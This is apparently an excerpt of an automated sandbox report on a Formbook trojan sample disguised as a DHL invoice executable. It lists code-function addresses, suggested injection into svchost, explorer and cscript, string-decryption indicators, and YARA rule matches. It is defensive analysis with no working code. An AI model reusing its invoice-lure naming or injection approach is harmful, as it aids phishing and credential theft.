Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0125CC39	0_2_0125CC39
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0125B119	0_2_0125B119
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012491C0	0_2_012491C0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0125D065	0_2_0125D065
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01261394	0_2_01261394
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01261706	0_2_01261706
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01247920	0_2_01247920
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0125997D	0_2_0125997D
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012619B0	0_2_012619B0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0126781B	0_2_0126781B
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01267A4A	0_2_01267A4A
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01261C77	0_2_01261C77
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01267CA7	0_2_01267CA7
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01261F32	0_2_01261F32
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012CBE44	0_2_012CBE44
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01279EEE	0_2_01279EEE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_001B35E0	0_2_001B35E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402D88	2_2_00402D88
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D593	2_2_0041D593
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00409E50	2_2_00409E50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041EE2E	2_2_0041EE2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E793	2_2_0041E793
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0073E0C6	2_2_0073E0C6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0073E2E9	2_2_0073E2E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0078A37B	2_2_0078A37B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00742305	2_2_00742305
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007663DB	2_2_007663DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007E63BF	2_2_007E63BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007C443E	2_2_007C443E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00786540	2_2_00786540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0075C5F0	2_2_0075C5F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007C05E3	2_2_007C05E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0078A634	2_2_0078A634
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007E2622	2_2_007E2622
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0074E6C1	2_2_0074E6C1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00744680	2_2_00744680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0074C7BC	2_2_0074C7BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0076286D	2_2_0076286D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0074C85C	2_2_0074C85C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0078C920	2_2_0078C920
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007D49F5	2_2_007D49F5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007569FE	2_2_007569FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007429B2	2_2_007429B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007E098E	2_2_007E098E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007C6BCB	2_2_007C6BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007ECBA4	2_2_007ECBA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007CAC5E	2_2_007CAC5E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007E2C9C	2_2_007E2C9C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0074CD5B	2_2_0074CD5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00770D3B	2_2_00770D3B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0075EE4C	2_2_0075EE4C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00772E2F	2_2_00772E2F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00750F3F	2_2_00750F3F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007B2FDC	2_2_007B2FDC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007DCFB1	2_2_007DCFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007BD06D	2_2_007BD06D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0075905A	2_2_0075905A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00743040	2_2_00743040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0076D005	2_2_0076D005
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007CD13F	2_2_007CD13F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007E1238	2_2_007E1238
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00747353	2_2_00747353
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0073F3CF	2_2_0073F3CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0077D47D	2_2_0077D47D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00775485	2_2_00775485
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00751489	2_2_00751489
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0074351F	2_2_0074351F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007E35DA	2_2_007E35DA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007D771D	2_2_007D771D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007757C3	2_2_007757C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007C579A	2_2_007C579A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007DF8EE	2_2_007DF8EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007BF8C4	2_2_007BF8C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007C5955	2_2_007C5955
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007C394B	2_2_007C394B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007F3A83	2_2_007F3A83
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00767B00	2_2_00767B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0073FBD7	2_2_0073FBD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007CDBDA	2_2_007CDBDA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007DFDDD	2_2_007DFDDD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0076DF7C	2_2_0076DF7C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007CBF14	2_2_007CBF14
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038A036	2_2_0038A036
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00381082	2_2_00381082
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038B232	2_2_0038B232
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038E5CD	2_2_0038E5CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00388912	2_2_00388912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00385B30	2_2_00385B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00385B32	2_2_00385B32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00382D02	2_2_00382D02
Source: C:\Windows\explorer.exe	Code function: 3_2_080E0036	3_2_080E0036
Source: C:\Windows\explorer.exe	Code function: 3_2_080D7082	3_2_080D7082
Source: C:\Windows\explorer.exe	Code function: 3_2_080D8D02	3_2_080D8D02
Source: C:\Windows\explorer.exe	Code function: 3_2_080DE912	3_2_080DE912
Source: C:\Windows\explorer.exe	Code function: 3_2_080E45CD	3_2_080E45CD
Source: C:\Windows\explorer.exe	Code function: 3_2_080E1232	3_2_080E1232
Source: C:\Windows\explorer.exe	Code function: 3_2_080DBB30	3_2_080DBB30
Source: C:\Windows\explorer.exe	Code function: 3_2_080DBB32	3_2_080DBB32
Source: C:\Windows\explorer.exe	Code function: 3_2_0909D232	3_2_0909D232
Source: C:\Windows\explorer.exe	Code function: 3_2_09094D02	3_2_09094D02
Source: C:\Windows\explorer.exe	Code function: 3_2_0909A912	3_2_0909A912
Source: C:\Windows\explorer.exe	Code function: 3_2_09097B30	3_2_09097B30
Source: C:\Windows\explorer.exe	Code function: 3_2_09097B32	3_2_09097B32
Source: C:\Windows\explorer.exe	Code function: 3_2_090A05CD	3_2_090A05CD
Source: C:\Windows\explorer.exe	Code function: 3_2_0909C036	3_2_0909C036
Source: C:\Windows\explorer.exe	Code function: 3_2_09093082	3_2_09093082
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0209E2E9	4_2_0209E2E9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020A2305	4_2_020A2305
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020EA37B	4_2_020EA37B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_021463BF	4_2_021463BF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020C63DB	4_2_020C63DB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0209E0C6	4_2_0209E0C6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02142622	4_2_02142622
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020EA634	4_2_020EA634
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020A4680	4_2_020A4680
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020AE6C1	4_2_020AE6C1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020AC7BC	4_2_020AC7BC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0212443E	4_2_0212443E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020E6540	4_2_020E6540
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_021205E3	4_2_021205E3
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020BC5F0	4_2_020BC5F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0214CBA4	4_2_0214CBA4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02126BCB	4_2_02126BCB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020AC85C	4_2_020AC85C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020C286D	4_2_020C286D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020EC920	4_2_020EC920
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0214098E	4_2_0214098E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020A29B2	4_2_020A29B2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_021349F5	4_2_021349F5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020B69FE	4_2_020B69FE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020D2E2F	4_2_020D2E2F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020BEE4C	4_2_020BEE4C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020B0F3F	4_2_020B0F3F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0213CFB1	4_2_0213CFB1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02112FDC	4_2_02112FDC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0212AC5E	4_2_0212AC5E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02142C9C	4_2_02142C9C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020D0D3B	4_2_020D0D3B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020ACD5B	4_2_020ACD5B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02141238	4_2_02141238
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020A7353	4_2_020A7353
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0209F3CF	4_2_0209F3CF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020CD005	4_2_020CD005
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020A3040	4_2_020A3040
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020B905A	4_2_020B905A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0211D06D	4_2_0211D06D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0212D13F	4_2_0212D13F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0213771D	4_2_0213771D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0212579A	4_2_0212579A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020D57C3	4_2_020D57C3
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020DD47D	4_2_020DD47D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020B1489	4_2_020B1489
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020D5485	4_2_020D5485
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020A351F	4_2_020A351F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_021435DA	4_2_021435DA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02153A83	4_2_02153A83
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020C7B00	4_2_020C7B00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0212DBDA	4_2_0212DBDA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0209FBD7	4_2_0209FBD7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0211F8C4	4_2_0211F8C4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0213F8EE	4_2_0213F8EE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02125955	4_2_02125955
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0212394B	4_2_0212394B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0212BF14	4_2_0212BF14
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020CDF7C	4_2_020CDF7C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0213FDDD	4_2_0213FDDD
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009D593	4_2_0009D593
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009E793	4_2_0009E793
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00082D88	4_2_00082D88
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00082D90	4_2_00082D90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009EE2E	4_2_0009EE2E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00089E50	4_2_00089E50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00082FB0	4_2_00082FB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005BA036	4_2_005BA036
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005B1082	4_2_005B1082
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005B8912	4_2_005B8912
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005BB232	4_2_005BB232
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005B5B32	4_2_005B5B32
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005B5B30	4_2_005B5B30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005B2D02	4_2_005B2D02
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005BE5CD	4_2_005BE5CD

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: String function: 0125F9F2 appears 40 times
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: String function: 01260A30 appears 46 times
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: String function: 01249CB3 appears 31 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 007AF970 appears 84 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00783F92 appears 132 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0078373B appears 253 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0073E2A8 appears 60 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0073DF5C appears 137 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 020E3F92 appears 132 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0210F970 appears 84 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0209DF5C appears 137 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 020E373B appears 253 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0209E2A8 appears 60 times

Sample file is different than original file name gathered from version info

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.347661877.0000000002D20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.347542892.0000000002B0D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000002.348923807.0000000000A6B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exej% vs COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Uses 32bit PE files

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Yara signature match

Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
